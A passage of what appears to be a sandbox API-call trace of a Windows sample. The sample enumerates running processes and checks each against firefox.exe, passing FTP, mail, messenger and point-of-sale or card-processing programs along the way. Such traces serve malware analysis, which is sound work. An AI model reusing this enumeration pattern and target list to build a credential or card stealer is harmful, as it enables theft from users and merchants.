lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="evidence.exe")) returned 1 [0183.887] lstrcmpA (lpString1="evidence.exe", lpString2="firefox.exe") returned -1 [0183.887] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.887] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatment.exe")) returned 1 [0183.888] lstrcmpA (lpString1="treatment.exe", lpString2="firefox.exe") returned 1 [0183.888] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.888] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="couple-great-later.exe")) returned 1 [0183.889] lstrcmpA (lpString1="couple-great-later.exe", lpString2="firefox.exe") returned -1 [0183.889] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.890] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="tree-strategy-into.exe")) returned 1 [0183.891] lstrcmpA (lpString1="tree-strategy-into.exe", lpString2="firefox.exe") returned 1 [0183.891] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.891] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="rather_mother_federal.exe")) returned 1 [0183.892] lstrcmpA (lpString1="rather_mother_federal.exe", lpString2="firefox.exe") returned 1 [0183.892] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.892] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="partnerscene.exe")) returned 1 [0183.894] lstrcmpA (lpString1="partnerscene.exe", lpString2="firefox.exe") returned 1 [0183.894] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.894] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x284, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="color-spend-open.exe")) returned 1 [0183.895] lstrcmpA (lpString1="color-spend-open.exe", lpString2="firefox.exe") returned -1 [0183.895] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.895] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="all_center_project.exe")) returned 1 [0183.897] lstrcmpA (lpString1="all_center_project.exe", lpString2="firefox.exe") returned -1 [0183.897] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.897] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="write.exe")) returned 1 [0183.898] lstrcmpA (lpString1="write.exe", lpString2="firefox.exe") returned 1 [0183.899] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.899] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="large_n't_voice.exe")) returned 1 [0183.900] lstrcmpA (lpString1="large_n't_voice.exe", lpString2="firefox.exe") returned 1 [0184.070] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.070] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="oh_care.exe")) returned 1 [0184.071] lstrcmpA (lpString1="oh_care.exe", lpString2="firefox.exe") returned 1 [0184.071] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.071] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="but example.exe")) returned 1 [0184.072] lstrcmpA (lpString1="but example.exe", lpString2="firefox.exe") returned -1 [0184.073] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.073] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="picturesouth.exe")) returned 1 [0184.075] lstrcmpA (lpString1="picturesouth.exe", lpString2="firefox.exe") returned 1 [0184.075] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.075] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="voteapproachfly.exe")) returned 1 [0184.076] lstrcmpA (lpString1="voteapproachfly.exe", lpString2="firefox.exe") returned 1 [0184.076] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.076] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="camera_from.exe")) returned 1 [0184.078] lstrcmpA (lpString1="camera_from.exe", lpString2="firefox.exe") returned -1 [0184.078] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.078] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0184.079] lstrcmpA (lpString1="3dftp.exe", lpString2="firefox.exe") returned -1 [0184.079] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.079] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0184.080] lstrcmpA (lpString1="absolutetelnet.exe", lpString2="firefox.exe") returned -1 [0184.080] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.080] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0184.081] lstrcmpA (lpString1="alftp.exe", lpString2="firefox.exe") returned -1 [0184.081] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.081] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0184.083] lstrcmpA (lpString1="barca.exe", lpString2="firefox.exe") returned -1 [0184.083] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.083] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0184.085] lstrcmpA (lpString1="bitkinex.exe", lpString2="firefox.exe") returned -1 [0184.085] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.085] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0184.086] lstrcmpA (lpString1="coreftp.exe", lpString2="firefox.exe") returned -1 [0184.086] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.086] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0184.088] lstrcmpA (lpString1="far.exe", lpString2="firefox.exe") returned -1 [0184.088] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.088] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0184.090] lstrcmpA (lpString1="filezilla.exe", lpString2="firefox.exe") returned -1 [0184.090] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.090] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0184.092] lstrcmpA (lpString1="flashfxp.exe", lpString2="firefox.exe") returned 1 [0184.092] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.092] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0184.093] lstrcmpA (lpString1="fling.exe", lpString2="firefox.exe") returned 1 [0184.093] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.093] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1008, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0184.095] lstrcmpA (lpString1="foxmailincmail.exe", lpString2="firefox.exe") returned 1 [0184.095] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.095] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0184.096] lstrcmpA (lpString1="gmailnotifierpro.exe", lpString2="firefox.exe") returned 1 [0184.097] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.097] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0184.098] lstrcmpA (lpString1="icq.exe", lpString2="firefox.exe") returned 1 [0184.098] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.099] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1030, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0184.100] lstrcmpA (lpString1="leechftp.exe", lpString2="firefox.exe") returned 1 [0184.100] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.100] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0184.101] lstrcmpA (lpString1="ncftp.exe", lpString2="firefox.exe") returned 1 [0184.102] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.102] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1044, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0184.103] lstrcmpA (lpString1="notepad.exe", lpString2="firefox.exe") returned 1 [0184.103] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.103] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0184.354] lstrcmpA (lpString1="operamail.exe", lpString2="firefox.exe") returned 1 [0184.354] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.354] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0184.356] lstrcmpA (lpString1="outlook.exe", lpString2="firefox.exe") returned 1 [0184.356] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.356] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0184.357] lstrcmpA (lpString1="pidgin.exe", lpString2="firefox.exe") returned 1 [0184.357] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.357] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0184.359] lstrcmpA (lpString1="scriptftp.exe", lpString2="firefox.exe") returned 1 [0184.359] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.359] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x107c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0184.360] lstrcmpA (lpString1="skype.exe", lpString2="firefox.exe") returned 1 [0184.360] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.360] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0184.362] lstrcmpA (lpString1="smartftp.exe", lpString2="firefox.exe") returned 1 [0184.362] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.362] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0184.363] lstrcmpA (lpString1="thunderbird.exe", lpString2="firefox.exe") returned 1 [0184.363] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.363] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0184.364] lstrcmpA (lpString1="trillian.exe", lpString2="firefox.exe") returned 1 [0184.365] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.365] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0184.366] lstrcmpA (lpString1="webdrive.exe", lpString2="firefox.exe") returned 1 [0184.366] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.366] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0184.368] lstrcmpA (lpString1="whatsapp.exe", lpString2="firefox.exe") returned 1 [0184.368] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.368] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0184.369] lstrcmpA (lpString1="winscp.exe", lpString2="firefox.exe") returned 1 [0184.369] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.369] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0184.371] lstrcmpA (lpString1="active-charge.exe", lpString2="firefox.exe") returned -1 [0184.371] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.371] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0184.373] lstrcmpA (lpString1="yahoomessenger.exe", lpString2="firefox.exe") returned 1 [0184.373] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.373] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0184.374] lstrcmpA (lpString1="afr38.exe", lpString2="firefox.exe") returned -1 [0184.375] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.375] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0184.376] lstrcmpA (lpString1="accupos.exe", lpString2="firefox.exe") returned -1 [0184.376] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.376] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1100, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0184.377] lstrcmpA (lpString1="aldelo.exe", lpString2="firefox.exe") returned -1 [0184.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.381] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0184.383] lstrcmpA (lpString1="centralcreditcard.exe", lpString2="firefox.exe") returned -1 [0184.383] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.383] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x111c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0184.384] lstrcmpA (lpString1="ccv_server.exe", lpString2="firefox.exe") returned -1 [0184.384] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.384] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0184.385] lstrcmpA (lpString1="creditservice.exe", lpString2="firefox.exe") returned -1 [0184.385] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.385] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0184.386] lstrcmpA (lpString1="edcsvr.exe", lpString2="firefox.exe") returned -1 [0184.386] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.387] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0184.388] lstrcmpA (lpString1="fpos.exe", lpString2="firefox.exe") returned 1 [0184.388] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.388] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0184.389] lstrcmpA (lpString1="isspos.exe", lpString2="firefox.exe") returned 1 [0184.389] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.389] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0184.390] lstrcmpA (lpString1="mxslipstream.exe", lpString2="firefox.exe") returned 1 [0184.390] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.390] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, 